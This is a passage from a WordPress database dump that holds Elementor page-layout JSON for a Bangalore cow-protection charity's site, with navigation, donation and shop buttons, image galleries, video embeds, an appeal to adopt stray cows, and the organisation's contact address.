"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11147,1856,'_elementor_page_assets','a:0:{}'),(11157,1859,'_elementor_edit_mode','builder'),(11158,1859,'_elementor_template_type','wp-page'),(11159,1859,'_elementor_version','3.7.8'),(11160,1859,'_wp_page_template','elementor_canvas'),(11161,1859,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11162,1859,'_elementor_page_assets','a:0:{}'),(11163,1860,'_elementor_edit_mode','builder'),(11164,1860,'_elementor_template_type','wp-page'),(11165,1860,'_elementor_version','3.7.8'),(11166,1860,'_wp_page_template','elementor_canvas'),(11167,1860,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\